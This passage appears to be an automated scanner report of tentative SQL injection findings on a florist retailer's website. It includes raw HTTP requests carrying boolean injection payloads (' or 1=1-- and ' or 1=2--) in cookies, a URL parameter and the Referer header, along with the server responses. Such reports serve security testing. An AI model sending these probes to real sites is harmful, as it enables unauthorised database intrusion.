User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000vYqYqATbr9y3gSABi7eMNL4:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE
Content-Length: 0

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:11:16 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000zqemLI5tFS3_cCVIEMj3gm6:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29038










<html>
<head>    
<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>

<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/flowers_enterprise_apr9.js"></script>

       
</head>
<body >
<input type="hidden" id="prodType" name="prodType" value="FPT" />

<table class="frame" cellpadding="0" cellspacing="0">
<tr>
<td align="left" width="50%" style="padding:5px 5px 0px 5px" valign="top">
<div id="deliveryCalendar">
<h3>Select a delivery date below</h3>
<div class="calInfoTxt">Click on date below to choose the delivery date of your gift.</div>


<div class="calMonth monthAlign" id="month2">
   
   <div class="calMonthHdr"><a id="prev" tabindex="7" href="javascript:callCal('3','2011','91637L','product','10010','','FPT','deliveryDate','prev')" ><span class="calNavText"><img alt="Previous" src="http://media6.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/calarrowsleft.gif" border="0" /></span></a> April 2011 <a href="javascript:callCal('5','2011','91637L','product','10010','','FPT','deliveryDate','next');" tabindex="10"><span class="calNavText"><img alt="Next" src="http://media6.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/calarrowsright.gif" border="0"/></span></a></div>
   

   <div class="calDaysHdr"><div class="calDaysHdrtxt">sun</div> <div class="calDaysHdrtxt">mon</div> <div class="calDaysHdrtxt">tues</div> <div class="calDaysHdrtxt">wed</div> <div class="calDaysHdrtxt">thurs</div> <div class="calDaysHdrtxt">fri</div> <div class="calDaysHdrtxt">sat</div></div>
       
           <div class="calWeek">
               
               
...[SNIP]...

Request 2

POST /deliverycalendarnew.do?month=512903751%20or%201%3d2--%20&year=2011&locationType=1&itemCount=1&prodType=FPT&productPrice=59.99&zip=10010&country=&productSKU=91637L&contextPageType=PRODUCT&isGeoSell=false&field=deliveryDate&baseCode=91637&nextMonthAvailableCheck=true&page=product HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Origin: http://ww30.1800flowers.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000vYqYqATbr9y3gSABi7eMNL4:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE
Content-Length: 0

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:11:16 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29038










<html>
<head>    
<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>

<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/flowers_enterprise_apr9.js"></script>

       
</head>
<body >
<input type="hidden" id="prodType" name="prodType" value="FPT" />

<table class="frame" cellpadding="0" cellspacing="0">
<tr>
<td align="left" width="50%" style="padding:5px 5px 0px 5px" valign="top">
<div id="deliveryCalendar">
<h3>Select a delivery date below</h3>
<div class="calInfoTxt">Click on date below to choose the delivery date of your gift.</div>


<div class="calMonth monthAlign" id="month2">
   
   <div class="calMonthHdr"><a id="prev" tabindex="7" href="javascript:callCal('3','2011','91637L','product','10010','','FPT','deliveryDate','prev')" ><span class="calNavText"><img alt="Previous" src="http://media6.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/calarrowsleft.gif" border="0" /></span></a> April 2011 <a href="javascript:callCal('5','2011','91637L','product','10010','','FPT','deliveryDate','next');" tabindex="10"><span class="calNavText"><img alt="Next" src="http://media6.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/calarrowsright.gif" border="0"/></span></a></div>
   

   <div class="calDaysHdr"><div class="calDaysHdrtxt">sun</div> <div class="calDaysHdrtxt">mon</div> <div class="calDaysHdrtxt">tues</div> <div class="calDaysHdrtxt">wed</div> <div class="calDaysHdrtxt">thurs</div> <div class="calDaysHdrtxt">fri</div> <div class="calDaysHdrtxt">sat</div></div>
       
           <div class="calWeek">
               
                   
                       
                       
                           <div class="calDay inactiveday" id="
...[SNIP]...
1.4. http://ww30.1800flowers.com/product.do [CMAVID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ww30.1800flowers.com
Path:   /product.do

Issue detail

The CMAVID cookie appears to be vulnerable to SQL injection attacks. The payloads 56663729'%20or%201%3d1--%20 and 56663729'%20or%201%3d2--%20 were each submitted in the CMAVID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /product.do HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
Origin: http://ww30.1800flowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=7009130384324031606755556663729'%20or%201%3d1--%20; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; JSESSIONID=0000se4bMqEJJFjkiTeOn0WDYky:-1; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305
Content-Length: 770

delDateColl=&personalizable=false&submitForm=&personalComment=&personalCount=&generalProductDataset=1011&hospitalDataset=10156&funeralHomeDataset=10216&ruralRouteDataset=10156&fagfDataset=11354&datase
...[SNIP]...

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 09 May 2011 01:28:48 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 38787






















<html>
<head>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<meta name="robots" content="noindex,nofollow"/>


<title>Error Occurred</title>
<link rel="canonical" href="http://www.1800flowers.com/error.do" />

<link rel="shortcut icon" href="http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico" />



<link rel="stylesheet" type="text/css" href="http://media5.1800flowers.com/800f_assets/jet/website/styles/flowers/carousel_002.css"/>


<link rel="stylesheet" type="text/css" href="http://media3.1800flowers.com/800f_assets/jet/website/styles/flowers/account_v1.css"/>



<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>




<style type="text/css">/* common.css */.trsHeader {background:#FFF url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x scroll 0 0 !important;} /*newcommoncss.css*/body {/* Edit - Body BG Image & Color Hex */background: url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/spr11_bkgrnd.gif) no-repeat #ceb5dd top center !important;_background-position-y: 1px; #background-position-y: 1px;}.Container {background:#FFF url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x !important;background-position:0 -1px !important;} /* Top nav style*/.bluetabs li a {color:#FFF !important; font-weight:bold;padding-left:30px !important;padding-right:30px !important;} /* Last Nav Tab paddding*/ .bluetabs li a.tabnormal8 {padding-right:15px !important;} .bluetabs {/* Edit NAV BG Img & color */background: url(http://media1.1800flowers.com/800f_asset
...[SNIP]...

Request 2

POST /product.do HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
Origin: http://ww30.1800flowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=7009130384324031606755556663729'%20or%201%3d2--%20; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; JSESSIONID=0000se4bMqEJJFjkiTeOn0WDYky:-1; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305
Content-Length: 770

delDateColl=&personalizable=false&submitForm=&personalComment=&personalCount=&generalProductDataset=1011&hospitalDataset=10156&funeralHomeDataset=10216&ruralRouteDataset=10156&fagfDataset=11354&datase
...[SNIP]...

Response 2

HTTP/1.1 500 Internal Server Error
Date: Mon, 09 May 2011 01:28:49 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Set-Cookie: JSESSIONID=0000OxINk2rPNAnwU2DMQGwt1bU:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 38787






















<html>
<head>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<meta name="robots" content="noindex,nofollow"/>


<title>Error Occurred</title>
<link rel="canonical" href="http://www.1800flowers.com/error.do" />

<link rel="shortcut icon" href="http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico" />



<link rel="stylesheet" type="text/css" href="http://media5.1800flowers.com/800f_assets/jet/website/styles/flowers/carousel_002.css"/>


<link rel="stylesheet" type="text/css" href="http://media3.1800flowers.com/800f_assets/jet/website/styles/flowers/account_v1.css"/>



<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>




<style type="text/css">/* common.css */.trsHeader {background:#FFF url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x scroll 0 0 !important;} /*newcommoncss.css*/body {/* Edit - Body BG Image & Color Hex */background: url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/spr11_bkgrnd.gif) no-repeat #ceb5dd top center !important;_background-position-y: 1px; #background-position-y: 1px;}.Container {background:#FFF url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x !important;background-position:0 -1px !important;} /* Top nav style*/.bluetabs li a {color:#FFF !important; font-weight:bold;padding-left:30px !important;padding-right:30px !important;} /* Last Nav Tab paddding*/ .
...[SNIP]...
1.5. http://ww30.1800flowers.com/shoppingbasket.do [brandCode cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ww30.1800flowers.com
Path:   /shoppingbasket.do

Issue detail

The brandCode cookie appears to be vulnerable to SQL injection attacks. The payloads 11283013'%20or%201%3d1--%20 and 11283013'%20or%201%3d2--%20 were each submitted in the brandCode cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /shoppingbasket.do HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=100111283013'%20or%201%3d1--%20; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:15:40 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Wj3sXdlqqkt2mok1wAhSlIN:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 150888

















   
   
   







<html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expires" content="1">

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">

   <meta name="robots" content="noindex,nofollow"/>


<!-- shopping basket head --><style type="text/css">#fagf {background:url('/800f_assets/jet/website/images/flowers/banners/fagf_holiday10_shoppingbg.jpg') no-repeat !important; width:212px !important; padding-left: 20px !important; padding-top: 84px !important;}.FindGiftLabel {color:#fff !important} .n-chkPaypal {margin-left:490px !important;}.n-chkCartRR {display:none;}</style>
<title>Shopping Basket - 1-800-FLOWERS.COM</title>
<link rel="canonical" href="http://ww30.1800flowers.com/shoppingbasket.do" />

<link rel="shortcut icon" href="http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico" />


<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>
<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/redesign/jquery-ui-1.7.2.custom_chk1.css"/>


<style type="text/css">/* common.css */.trsHeader {background:#FFF url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x scroll 0 0 !important;} /*newcommoncss.css*/body {/* Edit - Body BG Image & Color Hex */background: url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/spr11_bkgrnd.gif) no-repeat #ceb5dd top center !important;_background-position-y: 1px; #background-
...[SNIP]...

Request 2

GET /shoppingbasket.do HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=100111283013'%20or%201%3d2--%20; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:15:44 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 150888

















   
   
   







<html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expires" content="1">

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">

   <meta name="robots" content="noindex,nofollow"/>


<!-- shopping basket head --><style type="text/css">#fagf {background:url('/800f_assets/jet/website/images/flowers/banners/fagf_holiday10_shoppingbg.jpg') no-repeat !important; width:212px !important; padding-left: 20px !important; padding-top: 84px !important;}.FindGiftLabel {color:#fff !important} .n-chkPaypal {margin-left:490px !important;}.n-chkCartRR {display:none;}</style>
<title>Shopping Basket - 1-800-FLOWERS.COM</title>
<link rel="canonical" href="http://ww30.1800flowers.com/shoppingbasket.do" />

<link rel="shortcut icon" href="http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico" />


<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>
<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/redesign/jquery-ui-1.7.2.custom_chk1.css"/>


<style type="text/css">/* common.css */.trsHeader {background:#FFF url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x scroll 0 0 !important;} /*newcommoncss.css*/body {/* Edit - Body BG Image & Color Hex */background: url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/spr11_bkgrnd.gif) no-repeat #ceb5dd top center !important;_background-position-y: 1px; #background-position-y: 1px;}.Container {background:#FFF url(http://media1.
...[SNIP]...
1.6. https://ww30.1800flowers.com/checkoutsignin.do [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://ww30.1800flowers.com
Path:   /checkoutsignin.do

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /checkoutsignin.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902969048&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:16:30 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Ln0FjPqsWC1vFgUWBlg4otv:-1; Path=/
Set-Cookie: 18FBannerCode=seogoogle; Expires=Wed, 11-May-11 01:16:30 GMT; Path=/; Domain=1800flowers.com
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 19826























<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<meta name="robots" content="noindex,nofollow"/>


<title>Sign In - 1-800-FLOWERS.COM</title>
<link rel="canonical" href="http://www.1800flowers.com/checkoutsignin.do" />

<link rel="shortcut icon" href="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico" />


<link rel="stylesheet" type="text/css" href="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>

<link rel="stylesheet" type="text/css" href="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/styles/flowers/n-checkout_oct.css"/>

